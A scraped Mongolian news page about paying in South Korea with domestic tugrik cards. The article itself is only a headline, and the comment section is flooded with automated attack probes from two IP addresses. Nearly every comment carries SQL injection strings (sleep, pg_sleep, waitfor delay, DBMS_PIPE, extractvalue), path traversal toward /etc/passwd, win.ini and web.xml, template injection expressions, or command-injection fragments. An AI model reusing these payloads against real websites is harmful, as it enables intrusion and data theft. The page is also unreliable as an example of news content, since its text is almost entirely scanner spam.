Дотоодын төгрөгийн картаар БНСУ-д төлбөр тооцоо хийх боломж бүрдлээ

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-12-13 16:28:02
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin 185.234.72.114 96 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',18)='l
 • admin 185.234.72.114 96 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m
 • admin 185.234.72.114 96 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('g',18)
 • admin 185.234.72.114 96 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('p',0)
 • admin 185.234.72.114 96 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:18
 • admin 185.234.72.114 96 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 96 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:18'/**/
 • admin 185.234.72.114 96 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 96 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(18))::text>'0
 • admin 185.234.72.114 96 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 96 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(18))>0/**/
 • admin 185.234.72.114 96 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 96 өдөр

  123456"and(select*from(select+sleep(18))a/**/union/**/select+1)="
 • admin 185.234.72.114 96 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 96 өдөр

  123456'and(select*from(select+sleep(18))a/**/union/**/select+1)='
 • admin 185.234.72.114 96 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 96 өдөр

  (select*from(select+sleep(18)union/**/select+1)a)
 • admin 185.234.72.114 96 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 96 өдөр

  123456"and"a"="g
 • admin 185.234.72.114 96 өдөр

  123456"and"g"="g
 • admin 185.234.72.114 96 өдөр

  123456'and'e'='c
 • admin 185.234.72.114 96 өдөр

  123456'and'p'='p
 • admin 185.234.72.114 96 өдөр

  123456/**/and+2=7
 • admin 185.234.72.114 96 өдөр

  123456/**/and+2=2
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  <%- 967280119+948540496 %>
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  #set($c=947018396+956609056)${c}$c
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 185.234.72.114 96 өдөр

  123456
 • admin'"\( 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  ${(957242688+946878349)?c}
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',18)='u 185.234.72.114 96 өдөр

  123456
 • %u2215etc%u2215passwd 185.234.72.114 96 өдөр

  123456
 • admin鎈'"\( 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  ${876749555+860893842}
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t 185.234.72.114 96 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:18 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  /*1*/{{994921679+804153787}}
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1883280647')))>'0 185.234.72.114 96 өдөр

  123456
 • %2fetc%2fpasswd 185.234.72.114 96 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 96 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1744828133'))) 185.234.72.114 96 өдөр

  123456
 • /etc/passwdadmin 185.234.72.114 96 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(18))::text>'0 185.234.72.114 96 өдөр

  123456
 • admin/**/and/**/cast(md5('1940107872')as/**/int)>0 185.234.72.114 96 өдөр

  123456
 • /etc/passwd 185.234.72.114 96 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 96 өдөр

  123456
 • admin"and(select*from(select+sleep(18))a/**/union/**/select+1)=" 185.234.72.114 96 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1712142851)as/**/int))>'0 185.234.72.114 96 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 185.234.72.114 96 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 96 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1515214975))) 185.234.72.114 96 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 185.234.72.114 96 өдөр

  123456
 • expr 837363762 + 903650173 185.234.72.114 96 өдөр

  123456
 • admin'and(select*from(select+sleep(18))a/**/union/**/select+1)=' 185.234.72.114 96 өдөр

  123456
 • ./../../../../../../etc/passwd 185.234.72.114 96 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1452292670)))and" 185.234.72.114 96 өдөр

  123456
 • admin&set /A 972738853+954999956 185.234.72.114 96 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 96 өдөр

  123456
 • ../../../../../../etc/passwdadmin 185.234.72.114 96 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1906661712)))and' 185.234.72.114 96 өдөр

  123456
 • admin$(expr 883479167 + 815317589) 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456
 • ../../../../../../etc/passwd 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456'"\(
 • admin|expr 976629850 + 982136860 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456鎈'"\(
 • admin expr 850328785 + 819808818 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1989389705')))>'0
 • admin 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  expr 857044604 + 972566701
 • admin 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1104461348')))
 • <%- 974903858+878541369 %> 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456&set /A 952498566+884165179
 • admin"and"u"="z 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456/**/and/**/cast(md5('1942888634')as/**/int)>0
 • '-var_dump(md5(351454838))-' 185.234.72.114 96 өдөр

  123456
 • #set($c=865857671+815800164)${c}$c 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456$(expr 915500829 + 859070209)
 • admin"and"m"="m 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456'and(select'1'from/**/cast(md5(1062523662)as/**/int))>'0
 • admin 185.234.72.114 96 өдөр

  123456|expr 883068336 + 803554483
 • admin 185.234.72.114 96 өдөр

  extractvalue(1,concat(char(126),md5(1728646018)))
 • ${@var_dump(md5(434948377))}; 185.234.72.114 96 өдөр

  123456
 • admin'and'k'='g 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1729654993)))and"
 • admin 185.234.72.114 96 өдөр

  '-var_dump(md5(562947267))-'
 • admin 185.234.72.114 96 өдөр

  123456 expr 887472358 + 982868219
 • admin'and'v'='v 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  ${@var_dump(md5(279188236))};
 • admin 185.234.72.114 96 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1171127026)))and'
 • ${(852811441+830188505)?c} 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456
 • ${887251248+861603272} 185.234.72.114 96 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 96 өдөр

  123456
 • peyyqlollzxlafjjwywx 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 96 өдөр

  123456
 • ${935048220+951947994} 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  peyyqlollzxlafjjwywx
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  123456
 • /*1*/{{927839873+979120631}} 185.234.72.114 96 өдөр

  123456
 • admin 185.234.72.114 96 өдөр

  ${891986461+992423322}
 • admin 185.234.72.114 96 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',25)='u 194.163.191.42 97 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('w',0)='w 194.163.191.42 97 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:25 194.163.191.42 97 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(25))::text>'0 194.163.191.42 97 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 97 өдөр

  123456
 • admin"and(select*from(select+sleep(25))a/**/union/**/select+1)=" 194.163.191.42 97 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 97 өдөр

  123456
 • admin'and(select*from(select+sleep(25))a/**/union/**/select+1)=' 194.163.191.42 97 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 97 өдөр

  123456
 • admin"and"i"="g 194.163.191.42 97 өдөр

  123456
 • admin"and"y"="y 194.163.191.42 97 өдөр

  123456
 • admin'and'l'='y 194.163.191.42 97 өдөр

  123456
 • admin'and'r'='r 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',25)='n
 • admin 194.163.191.42 97 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g
 • admin 194.163.191.42 97 өдөр

  123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('w',25)
 • admin 194.163.191.42 97 өдөр

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('g',0)
 • admin 194.163.191.42 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:25
 • admin 194.163.191.42 97 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:25'/**/
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 194.163.191.42 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(25))::text>'0
 • admin 194.163.191.42 97 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(25))>0/**/
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 194.163.191.42 97 өдөр

  123456"and(select*from(select+sleep(25))a/**/union/**/select+1)="
 • ../../../../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and(select*from(select+sleep(25))a/**/union/**/select+1)='
 • admin 194.163.191.42 97 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • ../../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  (select*from(select+sleep(25)union/**/select+1)a)
 • ../../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • ../WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • ../WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456"and"k"="n
 • WEB-INF/web.xml;admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456"and"c"="c
 • WEB-INF/web.xml 194.163.191.42 97 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 97 өдөр

  123456
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and'm'='l
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 97 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and'w'='w
 • admin 194.163.191.42 97 өдөр

  123456/**/and+2=5
 • ../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456/**/and+2=2
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 97 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 97 өдөр

  123456
 • admin'"\( 194.163.191.42 97 өдөр

  123456
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 97 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 97 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 97 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1690248698')))>'0 194.163.191.42 97 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 97 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1310688008'))) 194.163.191.42 97 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • admin/**/and/**/cast(md5('1415523499')as/**/int)>0 194.163.191.42 97 өдөр

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1747258303)as/**/int))>'0 194.163.191.42 97 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1820788783))) 194.163.191.42 97 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 97 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1262350716)))and" 194.163.191.42 97 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 97 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1735098844)))and' 194.163.191.42 97 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'"\(
 • %2fetc%2fpasswd 194.163.191.42 97 өдөр

  123456
 • <%- 809351523+984259189 %> 194.163.191.42 97 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456鎈'"\(
 • #set($c=954120956+907538003)${c}$c 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1679664350')))>'0
 • /etc/passwd 194.163.191.42 97 өдөр

  123456
 • ${(915937768+957710309)?c} 194.163.191.42 97 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • ${868285487+948244544} 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1477870522')))
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • /*1*/{{997203377+914560409}} 194.163.191.42 97 өдөр

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456/**/and/**/cast(md5('1108416798')as/**/int)>0
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  <%- 859464167+933002307 %>
 • ../../../../../../etc/passwdadmin 194.163.191.42 97 өдөр

  123456
 • ../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  #set($c=922828915+866236231)${c}$c
 • admin 194.163.191.42 97 өдөр

  123456'and(select'1'from/**/cast(md5(1461549729)as/**/int))>'0
 • admin 194.163.191.42 97 өдөр

  ${(811695610+925589559)?c}
 • admin 194.163.191.42 97 өдөр

  ${822738658+868345358}
 • admin 194.163.191.42 97 өдөр

  extractvalue(1,concat(char(126),md5(1267594092)))
 • admin 194.163.191.42 97 өдөр

  /*1*/{{992546711+904709302}}
 • admin 194.163.191.42 97 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1349523628)))and'
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  '-var_dump(md5(973348573))-'
 • admin 194.163.191.42 97 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1749349953)))and"
 • admin 194.163.191.42 97 өдөр

  ${@var_dump(md5(863842146))};
 • admin 194.163.191.42 97 өдөр

  123456
 • expr 962276260 + 945674973 194.163.191.42 97 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • admin&set /A 992208433+924142322 194.163.191.42 97 өдөр

  123456
 • aarwdlfeftymaebpgvph 194.163.191.42 97 өдөр

  123456
 • admin$(expr 966353831 + 862634445) 194.163.191.42 97 өдөр

  123456
 • ${800817978+947447777} 194.163.191.42 97 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  aarwdlfeftymaebpgvph
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • '-var_dump(md5(305086904))-' 194.163.191.42 97 өдөр

  123456
 • admin|expr 995600926 + 835141451 194.163.191.42 97 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin expr 815113871 + 824306780 194.163.191.42 97 өдөр

  123456
 • ${@var_dump(md5(552040923))}; 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456
 • admin 194.163.191.42 97 өдөр

  123456